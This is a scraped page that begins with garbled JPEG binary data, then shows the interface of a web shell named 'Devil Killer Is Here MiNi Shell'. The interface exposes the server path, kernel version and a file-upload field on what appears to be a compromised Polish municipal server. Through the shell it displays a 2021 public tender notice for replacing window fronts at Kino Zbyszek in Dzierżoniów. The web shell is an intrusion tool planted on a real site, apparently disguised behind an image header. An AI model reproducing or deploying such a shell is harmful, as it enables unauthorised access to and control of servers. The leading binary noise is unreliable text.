JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211022/0024320601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i przebudowa Kina Zbyszek (etap VIII). Wymiana witryn okiennych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DZIERŻONIOWSKI OŚRODEK KULTURY W DZIERŻONIOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 891304052</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Świdnicka 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+4874 64 64 660</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@dok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i przebudowa Kina Zbyszek (etap VIII). Wymiana witryn okiennych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe3852d4-335a-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00243206</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00209349/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont i przebudowa Kina Zbyszek (etap VIII). Wymiana witryn okiennych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dok.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej<br/>eZamawiający, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor<br/>Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje; Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;Włączona obsługa JavaScript;<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o<br/>wielkości do 100 MB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Regulacje i procedury procesu zakupowego” pod adresem internetowym<br/>https://dok.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania<br/>przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego:<br/>• Administratorem Pani/Pana danych osobowych jest Dzierżoniowski Ośrodek Kultury, ul. Świdnicka<br/>23, 58-200 Dzierżoniów, reprezentowany przez Dyrektora Dzierżoniowskiego Ośrodka Kultury – Pana<br/>Krzysztofa Tokarskiego, tel. 74 646 46 60, e-mail: dyrektor@dok.pl, dok@dok.pl.<br/>• W sprawach ochrony Pani/Pana danych osobowych można kontaktować się z wyznaczonym<br/>Inspektorem Ochrony Danych pod adresem e-mail: iod4@synergiaconsulting.pl, telefonicznie:<br/>605937609 lub pisemnie na adres siedziby Administratora.<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO (przetwarzanie<br/>jest niezbędne do wypełnienia obowiązku prawnego ciążącego na Administratorze) w celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego w trybie podstawowym bez<br/>przeprowadzenia negocjacji (ustawa z 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z<br/>2021 r., poz. 1129 ze zm.), dalej „ustawa Pzp”.<br/>• Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>• Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają<br/>z ustawy Pzp.<br/>• W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO. Szczegółowe informacje nt. RODO ujęte są w<br/>klauzuli informacyjnej stanowiącej załącznik nr 11 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/2/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na wymianie witryn okiennych na elewacji północno-zachodniej w budynku Kina Zbyszek przy ul. Świdnickiej 25 w Dzierżoniowie w ramach projektu budowlanego pn. „Remont i przebudowa Kina Zbyszek”.<br/>2. Przedmiot zamówienia wskazany powyżej obejmuje:<br/>1) demontaż witryn okiennych wskazanych w przedmiarze robót oraz rysunkach załączonych do SWZ,<br/>2) montaż przeszklonych witryn okiennych wskazanych w dokumentacji przetargowej wraz z odpowiednią obróbką blacharską, zaprawą itp.<br/>3) wyburzenie betonowego daszka oraz montaż nowego szklanego daszka na zawiesiach nad wejściem bocznym (przylegającym do przedmiotowej witryny – elewacja północno-zachodnia),<br/>4) wywiezienie i utylizacja odpadów powstałych przy robotach demontażowych.<br/><br/>3. Zakres robót obejmuje miejsca zaznaczone kolorem żółtym na rysunkach załączonych do dokumentacji przetargowej.<br/>4. Zamawiający informuje, że istniejące nowe witryny zostały wykonane w systemie FA 50N SL firmy Yaval. <br/>Zamawiający wymaga, aby witryna została wykonana w tym systemie bądź równoważnym, bez listew dociskowych, szkło przydymione, jak w poprzednim etapie inwestycji.<br/>5. Roboty budowlane należy wykonać zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania i odbioru robót budowlanych (dokumenty dostępne są do wglądu w siedzibie zamawiającego) oraz przepisami budowlanymi. Witryny oraz szklany daszek nad wyjściem bocznym powinny być zamontowane zgodnie z instrukcją producenta.<br/>6. Zadanie zakończyć należy przygotowaniem odpowiedniej dokumentacji odbiorowej.<br/>7. Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja:<br/>- rysunek nr 12.2 – witryny,<br/>- rysunek nr 3 – elewacja północno-zachodnia,<br/>- rysunek nr 7 – rzut parteru,<br/>- rysunek nr 8 – rzut piętra ,<br/>- przedmiar robót – przedmiar stanowi narzędzie pomocnicze do wyceny, sporządzenia oferty i wykonania zamówienia (Wykonawca samodzielnie kwalifikuje niezbędne roboty).<br/>8. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Materiały użyte do robót budowlanych muszą posiadać niezbędne atesty, certyfikaty, aprobaty techniczne i muszą być dopuszczone do stosowania w budownictwie.<br/>9. Wykonawca zobowiązuje się do:<br/> 1) protokolarnego przejęcia placu budowy oraz jego zabezpieczenia i należytego utrzymania,<br/> 2) poniesienia wszelkich kosztów związanych z realizacją zamówienia i wypełnieniem wszystkich zobowiązań wynikających z dokumentacji oraz zobowiązań wynikających z uzyskanych uzgodnień i opinii oraz tych, które wykonawca zobowiązany jest uzyskać w trakcie realizacji robót budowlanych,<br/> 3) uporządkowanie terenu budowy po zakończeniu robót,<br/> 4) systematycznego wywozu materiału i gruzu z rozbiórki na składowisko odpadów, <br/> 5) wykonania badań, sprawdzeń i pomiarów w czasie wykonywania robót budowlanych oraz wszelkich badań odbiorowych,<br/> 6) organizacji miejsca składowania materiałów - zabrania się składowania materiałów na ciągach komunikacyjnych,<br/>7) ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej na okres realizacji robót,<br/>8) zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę. Wykonawca we własnym zakresie zapewnia niezbędne media warunkujące prawidłowe wykonawstwo robót,<br/>9) przekazania Zamawiającemu w dniu podpisania umowy oświadczeń o podjęciu obowiązków przez kierownika budowy,<br/>10) przedłożenia Zamawiającemu przed podpisaniem umowy dokumentów wynikających ze Specyfikacji Warunków Zamówienia,<br/>11) uczestnictwa kierownika budowy w radach budowy,<br/>12) innych niezbędnych czynności wymaganych przepisami prawa, a związanych z realizacją przedmiotu zamówienia.<br/>10. Wspólny Słownik Zamówień: <br/>Główny przedmiot : 45421000-4 roboty w zakresie stolarki budowlanej<br/>Dodatkowe przedmioty: 45421100-5 Instalowanie drzwi i okien, i podobnych elementów<br/><br/>11. Gwarancja i rękojmia<br/>Wymagany okres gwarancji - zgodnie z ofertą, minimum 36 miesięcy, maksymalnie 72 miesiące.<br/>Wykonawca ponosi odpowiedzialność z tytułu rękojmi za wady fizyczne i prawne na zasadach określonych w Kodeksie Cywilnym. Strony rozszerzają odpowiedzialność z tytułu rękojmi na okres gwarancji zadeklarowany przez Wykonawcę w ofercie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45421000-4 - Roboty w zakresie stolarki budowlanej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni<br/>wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży ofertę<br/>niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę<br/>punktów przyznanych w ramach każdego z podanych kryteriów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres obowiązywania gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp Zamawiający określa następujące warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>a) w zakresie doświadczenia:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub Wykonawcy występujący<br/>wspólnie lub przy udziale innego podmiotu, na którego zdolnościach technicznych lub zawodowych polega Wykonawca wykaże (doświadczenie ww. podmiotów nie sumuje się), że<br/>nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę<br/>budowlaną polegające na wymianie stolarki okiennej (witryny/okna) w budynku użyteczności<br/>publicznej, o wartości robót co najmniej 100 000 PLN brutto każda i załączy dowody określające,<br/>że roboty te zostały wykonane należycie.<br/>b) w zakresie kwalifikacji zawodowych:<br/>Warunek zostanie spełniony, jeżeli Wykonawca samodzielnie lub Wykonawcy występujący<br/>wspólnie, lub przy udziale podmiotu, na którego zdolnościach technicznych lub zawodowych<br/>polega Wykonawca wykaże, że dysponuje:<br/>- kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjnobudowlanej.<br/>Za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia,<br/>które wydane zostały na podstawie wcześniej obowiązujących przepisów prawnych oraz<br/>odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej,<br/>Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art.<br/>12 a oraz innych przepisów ustawy Prawo Budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn.<br/>zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220 z późn.<br/>zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy dotyczące braku podstaw do wykluczenia z postępowania na podstawie<br/>przesłanek<br/>określonych w art. 108 ust. 1 ustawy Pzp (wzór stanowi załącznik nr 2 do SWZ). Zgodnie z art. 274 ust.<br/>1 ustawy Pzp, Zamawiający przed<br/>wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnego na dzień złożenia, następującego<br/>podmiotowego środka dowodowego: Potwierdzenie aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w rozdziale II podrozdziale 9 pkt. 1 lit. b SWZ w zakresie podstaw wykluczenia z<br/>postępowania wskazanych przez Zamawiającego - załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (licząc wstecz od<br/>dnia, w którym upływa termin składnia ofert), a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty – załącznik nr 9 do SWZ.<br/>Jeżeli Wykonawca powołuje sią na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi Wykonawcami w ramach konsorcjum, powyższy wykaz dotyczy robót budowlanych<br/>faktycznie przez niego wykonanych.<br/>b) wykaz z osobą, skierowaną przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnej za kierowanie robotami budowlanymi, wraz z informacjami na temat jej<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nią czynności oraz informacją o<br/>podstawie do dysponowania tą osobą – załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda, by Wykonawca złożył wraz z ofertą następujące <br/>przedmiotowe środki dowodowe:<br/>- wykaz podstawowych materiałów i urządzeń (produktów) wyspecyfikowanych przez Zamawiającego w załączniku nr 1a do SWZ. Wykonawcy w załączniku nr 1a do oferty przetargowej muszą podać wykaz tych produktów wraz z ich nazwami (nazwami producentów),typami i modelami urządzeń/materiałów, należy wskazać parametry techniczne materiałów lub urządzeń (produktów). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawca może uzupełnić załącznik nr 1a do SWZ, który stanowi wykaz podstawowych materiałów i urządzeń (produktów). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Ofertowy stanowi załącznik nr 1 do SWZ. 2. Aktualne na dzień złożenia<br/>oświadczenia o niepodleganiu wykluczeniu (stanowi załącznik nr 2 do SWZ) oraz spełnianiu<br/>warunków udziału w postępowaniu (stanowi załącznik nr 3 do SWZ) w zakresie wskazanym w<br/>rozdziale II podrozdziałach 7 i 8 SWZ –- każdy osobno spośród Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (dotyczy również wspólników spółki cywilnej) i<br/>podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia<br/>warunków udziału 